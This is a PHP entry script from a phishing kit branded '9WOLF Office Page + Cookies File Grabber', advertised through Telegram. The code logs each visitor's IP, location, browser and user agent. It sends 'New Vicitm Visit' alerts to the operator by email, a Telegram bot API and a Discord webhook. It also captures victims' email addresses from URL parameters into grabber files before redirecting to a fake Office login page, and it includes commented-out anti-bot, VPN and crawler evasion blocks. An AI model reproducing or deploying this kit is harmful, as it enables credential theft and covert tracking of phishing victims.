<?php
/*
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡟⠁⠼⠻⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡞⠀⠀⠀⠸⡏⣇⠀⠀⣀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡞⠀⠀⠀⠀⢠⡇⢹⣀⠞⠛⢷⡄⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡟⠀⠀⠀⠀⣶⣿⣥⡬⡟⠀⠀⠀⣿⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣴⠏⠀⠀⠀⠀⠀⢻⠈⠁⢹⡇⠀⠀⢰⡟⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠶⠛⠛⣻⠅⠀⠀⠀⠀⠀⠀⢸⣆⡴⠟⠃⠀⠀⡾⠁⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡴⠋⡴⢿⡿⠏⠀⠀⠀⠀⠀⠀⠀⢈⣿⠁⠀⠀⠀⢰⠇⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡞⠁⣸⣧⠽⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⢠⡆⣿⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡟⠀⠀⣿⣿⣰⡆⠀⠀⠀⠀⠀⠀⠀⠀⡆⠀⣠⣿⡿⣦⣿⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⠀⠀⠀⠘⢻⢿⣇⡀⠀⠀⢀⠀⠀⠀⣸⠷⣿⣯⠇⠘⠽⢻⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⢀⣿⠟⠀⠀⢶⣄⠈⠇⣿⣷⠀⠀⠘⣇⠀⠀⠘⣶⠿⠀⠀⠀⠀⠸⣇⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣾⠏⠀⢰⡀⢸⣿⠃⠲⠃⢻⣶⡄⣦⣿⠀⠀⠈⠁⠀⠀⠀⠀⠀⠀⢿⡀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢀⣴⣟⣁⣠⣴⣿⡇⢸⡏⠀⠀⠀⠾⢹⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣷⠀⠀⠀⠀⠀
⣀⣀⣤⣴⣿⣟⠀⠉⣩⣿⡿⢡⡟⠀⠀⠀⠀⠀⠘⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣧⠀⠀⠀⠀
⠀⠉⠛⠿⢿⣿⣶⣿⣿⣯⣶⣿⣿⠇⠀⠀⠀⠀⠀⠘⠳⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠸⣆⠀⠀⠀
⠀⠀⠀⠀⠀⣼⣿⣫⠍⠙⠚⠋⣿⢀⣶⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣆⠀⠀⠀⣠⠀⣷⣿⡄⠀⠀
⠀⠀⠀⠀⣼⡿⣿⡏⣸⠃⠀⠀⢸⡿⣿⡀⢀⠀⠀⠀⠀⠀⠀⠀⢦⣄⠀⠀⣿⡄⠀⢰⣿⣆⣿⠻⣧⠀⠀
⠀⠀⠀⢰⡟⢠⣿⣿⡯⠀⠀⠀⠀⠳⠸⣧⠈⣷⡀⠰⡄⠀⠀⠀⠈⣿⣇⣰⠟⣷⡄⣸⣿⠻⣿⣇⠛⠀⠀
⠀⠀⠀⠀⢠⣿⣿⣿⣿⢠⡇⠀⠀⠀⠀⠙⣷⣿⢿⣆⢹⣆⠀⠀⢰⡇⣿⠏⠀⠈⢿⣿⣿⡆⠙⢿⣦⠀⠀
⠀⠀⠀⠀⢸⣏⣿⢿⣿⡿⠀⠀⠀⠀⠀⠀⠈⠛⠄⠻⢿⡟⢷⣤⣾⠁⠁⠀⠀⠀⠀⠉⠻⣿⡄⡈⠹⣧⠀
⠀⠀⠀⠀⠈⢸⡏⣸⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠊⠻⣿⡄⠀⠀⠀⠀⠀⠀⠀⠈⡗⠹⣷⣼⡆
⠀⠀⠀⠀⠀⢸⡃⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠂⠀⠀⠀⠀⠀⠀⠀⠛⠀⣿⡿⣷
⠀⠀⠀⠀⠀⠀⠀⠙⠛⠛⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠲⠿⠇⠉
 * //Think Twice , Code Once\\
 * //We work in the dark to serve the light\\
 * 9WOLF Office Page + Cookies File Grabber
 * Version 5
 * REMEMBER:  
 * Telegram Channel is : @NINEWOLFSTORE
 * Telegram Store is   : @NINEWOLFSTORE_bot

 * CopyRights: all reserved https://9wolf.io
###########################################
#$            @NINEWOLFSTORE             #$
#$                  Says:                #$
#$           As the Hunter exist         #$ 
#$          The victim exist too         #$  
###########################################
 ================IF AGREED=================
 ==================THEN====================
=To Be save Join Our Telegram Channel
=   @NINEWOLFSTORE
=To Be Secured Join Our Telegram Store
=   @NINEWOLFSTORE_bot

*/
error_reporting(E_ALL ^ E_NOTICE);
ob_start();
session_start();

$path = "./site/";
require ("9WOLFConfi/Guration.php");
require ("9WOLFConfi/Function.php");

//header("Location: ./_/index.php");





/**
require ("9WOLFDecline/AntiBotIp.php");
require ("9WOLFDecline/AntiBotPw.php");
require ("9WOLFDecline/AntiBotKillBot.php");
require ("9WOLFDecline/AntiBotUserAgent.php");

require ("9WOLFDecline/AntiBotIsp.php"); 
require ("9WOLFDecline/AnitiBotHost.php");

require ("9WOLFDecline/AntiBotPhishTank.php");
require ("9WOLFDecline/AntiBotVpn.php");
require ("9WOLFDecline/AntiBotProxy.php");
require ("9WOLFDecline/AntBotProtection.php");
require ("9WOLFDecline/SaveBrowsing.php");
require ("9WOLFDecline/DiscoveredBot.php");
require ("9WOLFDecline/AntiBotThree.php");
require ("9WOLFDecline/DisturbOne.php");
require ("9WOLFDecline/DisturbTwo.php");

require("9WOLFDecline/Anti/Bot-Crawler.php");
@require("9WOLFDecline/Anti/Crawler/src/CrawlerDetect.php");
use JayBizzle\CrawlerDetect\CrawlerDetect;


if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { include($path."index.php"); exit(); }
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { include($path."index.php"); exit(); }

**/



$rand = generateRandomString(130);
$ip = getIp();
$Allvisitor = dataVisitor($ip)."\n";
$_SESSION['ipFullData'] = $Allvisitor;
$AllvisitorFile = fopen("9WOLFHost/Fishes/4ll.html","a");
fwrite($AllvisitorFile,$Allvisitor);
fclose($AllvisitorFile);


$ip = getIp();
$data = GetData();
$city = $data['city'];
$country = $data['country'];
$Currency = $data['Currency'];
$Country_code = $data['Country_code'];

// Start Session 
$_SESSION["ip"] = $ip;
$_SESSION["country"] = $country;
$_SESSION["currency"] = $Currency;
$_SESSION["Country_code"] = $Country_code;



/**
$countryBlock =strtolower($countryBlock);
$allowdCountry = strtolower($allowdCountry);



if ($countryBlock == "true") {
	if(countryLock(strtolower($Country_code),$allowdCountry) == false and $ip != $yourIPCountry ){
	    $message = ("9WOLF Declined => Country: ".$allowdCountry." [Not Allowed Country] :\n  || Date:".gmdate ("d M,Y")." Time:".gmdate ("g:i a")."\n\n");
	    $file = fopen("9WOLFGrabber/DiscoveredIp.txt","a");
		fwrite($file,$message."\n");
		fclose($file);
		include($path."index.php");exit();
		echo "country";

	}
}

	$ai = /9/?ai=xd;
	if (isset($_GET['ai'])) {
	 $ai = isset($_GET['ai']) ? trim(htmlentities($_GET['ai'])):'';
      if ($ai !== "xd") {
	  include($path."index.php");exit
	  ();

	  }
	}else{
		include($path."index.php");exit();
	}



$redirect = strtolower($redirect);
$redirectFrom = strtolower($redirectFrom);


if ($redirect == "true") {
	if(checkRedirect($redirectFrom) == false ){
		include($path."index.php");exit();
		echo "redirectFrom";

	}
}


**/


/**
$accessOneTimeIp = strtolower($accessOneTimeIp);  // Access the page one time by same IP
if ($accessOneTimeIp == "true") {
	$ip = $_SESSION["ip"];
	$AllowedIp = $yourIPAceess;
	if (accessOneTimeIP($ip) == false and $ip != $AllowedIp) {
		//include($path."index.php");exit();
		echo "ip";
	}else{
	    $message = ("9WOLF Declined => !p: ".$ip." [On Time Ip Access] :\n  || Date:".gmdate ("d M,Y")." Time:".gmdate ("g:i a")."\n\n");
		$file = fopen("9WOLFGrabber/DiscoveredIp.txt","a");
		fwrite($file,$message."\n");
		fclose($file);
	}
}

**/


//here
$LogginIp = $_SESSION['ipFullData'];
$sessionIp = fopen("9WOLFHost/Fishes/4ll0w3d.html","a+");
fwrite($sessionIp,"$LogginIp"); 
fclose($sessionIp);

$telegramMsg ="
-----------".$PageName."-----------|-
[Cookies Vs 38 ".$YourName."️📁
[New📌 Vicitm Visit🚀
|--------【tele: Goodheart001 👽】--------|
[👤Login User IP |👉 ".$_SESSION['ipFullData']
."[🌐Browser👉".WOLF_Browser($_SERVER['HTTP_USER_AGENT'])." On ".WOLF_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤User Agent |👉 ".($_SERVER['HTTP_USER_AGENT'])."";

$discordMsg ="
-------------".$PageName."-------------
[Hello ".$YourName."️📁
[New Vicitm Visit🚀
-------------9WOLF-------------
[👤Login User IP |👉 ".$_SESSION['ipFullData']."[🌐Browser👉".WOLF_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".WOLF_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤User Agent |👉 ".($_SERVER['HTTP_USER_AGENT'])."";

          $Subject = "[New Vicitm Visit🚀️ \n";
          $headers .= "MIME-Version: 1.0" . "\r\n";          $headers .= "From: ".$Owner.".<$WOLFServer>." . "\r\n";
          $headers .= "Content-type:text/plan;charset=UTF-8" . "\r\n";
          $msg .= "-------------".$PageName."-------------️ \n \n";
          $msg .= "[[New Vicitm Visit🚀️ \n";
          $msg .= "[-------------9WOLF------------- \n";
          $msg .= "[👤Email Access      : ".$_SESSION['emailaccess']." ||\n";
          $msg .= "[👤Login User IP |👉 ".$_SESSION['ipFullData']."[🌐Browser👉".WOLF_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".WOLF_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤User Agent |👉 ".($_SERVER['HTTP_USER_AGENT'])."";
          
   

if ($sendToEmail == "true") {
    $WOLFCoded = array(
        'msg' => $msg,
        'headers' => $headers,
        'Subject' => $Subject,
    );
    //echo json_encode($WOLFCoded);
        
    send($yourEmail, $Subject, $msg,$headers);

}
      
if ($sendToTelegramBot == "true") { 
    $WOLFCoded = array(
        'telegramMsg' => $telegramMsg,
        'discordMsg' => $discordMsg,
    );
    //echo json_encode($WOLFCoded);
    send($telegramMsg,$botToken,$chatId);

      
 $WOLFApi="https://api.telegram.org/bot".$botToken;
  $sendToTelegramBot=[
      'chat_id'=> urlencode($chatId),
      'text'=> $telegramMsg,
  ];
  $ch = curl_init($WOLFApi . '/sendMessage');
  curl_setopt($ch, CURLOPT_HEADER, false);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, ($sendToTelegramBot));
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  $answer = curl_exec($ch);
  curl_close($ch);
 
     } 
 if ($sendToDiscordBot == "true"){
     $WOLFCoded = array(
        'discordMsg' => $discordMsg,
    );
    //echo json_encode($WOLFCoded);
    $WOLFApi = $webHookUrl; 
    $json_data = array ('content'=>"$discordMsg");
    $make_json = json_encode($json_data);
    $ch = curl_init( $WOLFApi );
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: application/json'));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $make_json);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $answer = curl_exec($ch);
}





$emailGrabber = strtolower($emailGrabber);

if ($emailGrabber =="true") {
	$email = bs2EmailGrabber($_GET['email']);
	if (isset($email) or filter_var($email, FILTER_VALIDATE_EMAIL)) {
		$_SESSION['emailaccess'] = $email;
		$_SESSION['9WOLF_SESSION_T0k3n'] = $WOLF_SESSION_T0k3n;
		header("Location: ./$priv0=".$Country_code);exit();
	}else{
	    echo "emailaccess";
	}
}


//  This is for $listSent variable
//  Should Send as This https://link.com?email=9wolf@example.com   
//  And Put Your list in (9WOLFGrabber/EmailListGrabber.txt)

$listSent = strtolower($listSent);
if ($listSent == "true") {
	if (isset($_GET['email'])) {
			$email = bs2EmailGrabber($_GET['email']);
		if (filter_var($email, FILTER_VALIDATE_EMAIL)) {
			if ( CheckEmail($email) == false) {
				include($path."index.php");exit();
			}else{
				$_SESSION['emailGrabber'] = $email;
				$file = fopen("visitors/emails.txt","w");
				fwrite($file, $email);
				fclose($file);
			}
		}
	}else{
		echo "listSent";
		include($path."index.php");exit();
	}
}



$accessOneTime = strtolower($accessOneTime);  // Access page only one time on machine
if ($accessOneTime == "true") {
	$email = bs2EmailGrabber($_GET['email']);
	if (isset($email)) {
		if (filter_var($email, FILTER_VALIDATE_EMAIL)) {
			// echo accessOneTime($email);

			if (accessOneTime($email) == false and $email != $yourEmailGrabber) {
				//include($path."index.php");exit();
				echo "emailAccess";

			}else{
				$file = fopen("9WOLFGrabber/emailListGrabber.txt","a");
				fwrite($file,$email."\n");
				fclose($file);
			}
		}
	}else{
		//include($path."index.php");exit();
		echo "emailGrabberAcc";

		
	}
}


header("Location: ./_/index.php");


?>